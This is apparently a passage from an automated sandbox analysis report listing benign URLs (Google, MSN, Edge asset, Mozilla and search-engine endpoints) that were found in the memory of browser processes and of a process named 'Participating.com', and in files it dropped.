            Source: chrome.exe, 00000011.00000003.2054032537.00006C7802BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054590983.00006C7802C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054252694.00006C780234C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2058221211.00006C780235C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054216422.00006C7802CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054114288.00006C7802CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054171670.00006C7802CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: msedge.exe, 00000015.00000003.2158586985.0000022AEB172000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2188099617.0000022AEB172000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
            Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://assets.msn.cn/resolver/
            Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://assets.msn.com/resolver/
            Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://bit.ly/wb-precache
            Source: Participating.com, 0000000B.00000002.2649991672.0000000005050000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2647629721.0000000004D2C000.00000004.00000800.00020000.00000000.sdmp, PH4O89.11.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
            Source: Participating.com, 0000000B.00000002.2649991672.0000000005050000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2647629721.0000000004D2C000.00000004.00000800.00020000.00000000.sdmp, PH4O89.11.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
            Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://browser.events.data.msn.cn/
            Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://browser.events.data.msn.com/
            Source: Reporting and NEL.24.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
            Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://c.msn.com/
            Source: Participating.com, 0000000B.00000002.2647629721.0000000004CE2000.00000004.00000800.00020000.00000000.sdmp, DBAI5P.11.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: service_worker_bin_prod.js.23.dr, offscreendocument_main.js.23.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
            Source: chrome.exe, 00000011.00000003.2046077675.00006C7800BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019497736.00006C7800BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2031692934.00006C7800BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007829951.00006C7800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2070923578.00006C7800BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
            Source: chrome.exe, 00000011.00000003.2046077675.00006C7800BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019497736.00006C7800BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2031692934.00006C7800BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007829951.00006C7800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2070923578.00006C7800BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
            Source: Participating.com, 0000000B.00000002.2649991672.0000000004DFC000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2647629721.0000000004CE2000.00000004.00000800.00020000.00000000.sdmp, MYU379.11.dr, Web Data.23.dr, DBAI5P.11.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Participating.com, 0000000B.00000002.2649991672.0000000004DFC000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2647629721.0000000004CE2000.00000004.00000800.00020000.00000000.sdmp, MYU379.11.dr, Web Data.23.dr, DBAI5P.11.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: chrome.exe, 00000011.00000003.2030954255.00006C7800C70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2197308191.000047B80017C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
            Source: manifest.json.23.drString found in binary or memory: https://chrome.google.com/webstore/
            Source: chrome.exe, 00000011.00000003.2009605110.00006C7800C68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2012516737.00006C780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2020378697.00006C7800E40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019708088.00006C780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2012045671.00006C7800E40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007757048.00006C7800C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2009388296.00006C7800C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2030954255.00006C7800C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2000517489.0000474C0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2048687585.0000474C00974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2000647191.0000474C00728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2000517489.0000474C0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2048687585.0000474C00974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2000647191.0000474C00728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
            Source: chrome.exe, 00000011.00000003.2047333914.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047164417.00006C780298C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2047367737.00006C780299C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2051212256.00006C7802660000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2000517489.0000474C0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2048687585.0000474C00974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2000647191.0000474C00728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
            Source: msedge.exe, 00000015.00000002.2197308191.000047B80017C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.23.drString found in binary or memory: https://chromewebstore.google.com/
            Source: msedge.exe, 00000015.00000002.2197308191.000047B80017C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/https://chrome.google.com/webstoreG
            Source: chrome.exe, 00000011.00000003.1996744063.000012F8002EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1996723267.000012F8002E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
            Source: chrome.exe, 00000011.00000003.2007829951.00006C7800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2070923578.00006C7800BCC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2191150669.000047B800040000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://clients2.google.com/service/update2/crx
            Source: chrome.exe, 00000011.00000003.2046077675.00006C7800BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2070923578.00006C7800BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxlx
            Source: Participating.com, 0000000B.00000002.2649991672.0000000005050000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2647629721.0000000004D2C000.00000004.00000800.00020000.00000000.sdmp, PH4O89.11.drString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
            Source: Participating.com, 0000000B.00000002.2649991672.0000000005050000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2647629721.0000000004D2C000.00000004.00000800.00020000.00000000.sdmp, PH4O89.11.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: Reporting and NEL.24.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
            Source: chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://docs.google.com/
            Source: chrome.exe, 00000011.00000003.2036236532.00006C7801634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
            Source: chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-autopush.corp.google.com/
            Source: chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-daily-0.corp.google.com/
            Source: chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-daily-1.corp.google.com/
            Source: chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-daily-2.corp.google.com/
            Source: chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-daily-3.corp.google.com/
            Source: chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-daily-4.corp.google.com/
            Source: chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-daily-5.corp.google.com/
            Source: chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-daily-6.corp.google.com/
            Source: chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-preprod.corp.google.com/
            Source: chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive-staging.corp.google.com/
            Source: chrome.exe, 00000011.00000003.2019623838.00006C780120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
            Source: chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://drive.google.com/
            Source: chrome.exe, 00000011.00000003.2070923578.00006C7800BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
            Source: Participating.com, 0000000B.00000002.2649991672.0000000004DFC000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2647629721.0000000004CE2000.00000004.00000800.00020000.00000000.sdmp, MYU379.11.dr, Web Data.23.dr, DBAI5P.11.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Participating.com, 0000000B.00000002.2649991672.0000000004DFC000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2647629721.0000000004CE2000.00000004.00000800.00020000.00000000.sdmp, MYU379.11.dr, Web Data.23.dr, DBAI5P.11.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: Participating.com, 0000000B.00000002.2649991672.0000000004DFC000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2647629721.0000000004CE2000.00000004.00000800.00020000.00000000.sdmp, MYU379.11.dr, Web Data.23.dr, DBAI5P.11.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: 000003.log1.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
            Source: 000003.log1.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
            Source: 000003.log2.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.dr, HubApps Icons.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.dr, HubApps Icons.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
            Source: msedge.exe, 00000015.00000002.2202653282.000047B8003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
            Source: Cookies.24.drString found in binary or memory: https://msn.comXID/
            Source: Cookies.24.drString found in binary or memory: https://msn.comXIDv10
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://music.amazon.com
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://music.apple.com
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://music.yandex.com
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
            Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://ntp.msn.cn/edge/ntp
            Source: 2cc80dabc69f58b6_0.23.dr, 000003.log10.23.drString found in binary or memory: https://ntp.msn.com
            Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://ntp.msn.com/edge/ntp
            Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
            Source: Session_13378826832012205.23.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
            Source: QuotaManager-journal.23.dr, QuotaManager.23.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
            Source: 2cc80dabc69f58b6_0.23.drString found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
            Source: msedge.exe, 00000015.00000002.2202653282.000047B8003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
            Source: chrome.exe, 00000011.00000003.2054032537.00006C7802BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054590983.00006C7802C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054252694.00006C780234C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2058221211.00006C780235C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054216422.00006C7802CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054114288.00006C7802CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054171670.00006C7802CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
            Source: chrome.exe, 00000011.00000003.2058254143.00006C7800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
            Source: chrome.exe, 00000011.00000003.2054032537.00006C7802BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054590983.00006C7802C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054252694.00006C780234C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2058221211.00006C780235C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054216422.00006C7802CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054114288.00006C7802CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054171670.00006C7802CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
            Source: chrome.exe, 00000011.00000003.2054032537.00006C7802BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054590983.00006C7802C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054252694.00006C780234C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2058221211.00006C780235C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054216422.00006C7802CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054114288.00006C7802CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2054171670.00006C7802CA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://open.spotify.com
            Source: chrome.exe, 00000011.00000003.2009725818.00006C7800700000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
            Source: chrome.exe, 00000011.00000003.2009725818.00006C7800700000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
            Source: chrome.exe, 00000011.00000003.2009725818.00006C7800700000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
            Source: chrome.exe, 00000011.00000003.2009725818.00006C7800700000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
            Source: chrome.exe, 00000011.00000003.2009725818.00006C7800700000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://outlook.live.com/mail/0/
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://outlook.office.com/mail/0/
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
            Source: msedge.exe, 00000015.00000003.2153758878.000047B800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153952278.000047B80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153695423.000047B800264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
            Source: msedge.exe, 00000015.00000003.2153758878.000047B800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153952278.000047B80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153695423.000047B800264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
            Source: msedge.exe, 00000015.00000003.2153758878.000047B800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153952278.000047B80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153695423.000047B800264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
            Source: msedge.exe, 00000015.00000003.2153758878.000047B800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153952278.000047B80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153695423.000047B800264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
            Source: msedge.exe, 00000015.00000003.2153758878.000047B800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153952278.000047B80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153695423.000047B800264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
            Source: msedge.exe, 00000015.00000003.2153758878.000047B800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153952278.000047B80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153695423.000047B800264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
            Source: msedge.exe, 00000015.00000003.2153758878.000047B800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153952278.000047B80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153695423.000047B800264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
            Source: msedge.exe, 00000015.00000003.2153758878.000047B800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153952278.000047B80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153695423.000047B800264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
            Source: msedge.exe, 00000015.00000003.2153695423.000047B800264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
            Source: msedge.exe, 00000015.00000003.2153758878.000047B800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153952278.000047B80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153695423.000047B800264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
            Source: msedge.exe, 00000015.00000003.2153758878.000047B800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153952278.000047B80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153695423.000047B800264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
            Source: msedge.exe, 00000015.00000003.2153758878.000047B800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153952278.000047B80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153695423.000047B800264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
            Source: msedge.exe, 00000015.00000003.2153758878.000047B800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153952278.000047B80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153695423.000047B800264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
            Source: msedge.exe, 00000015.00000003.2153758878.000047B800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153952278.000047B80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153695423.000047B800264000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
            Source: chrome.exe, 00000011.00000003.2019573271.00006C7801170000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019519827.00006C78003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2019623838.00006C780120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
            Source: 3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
            Source: chrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
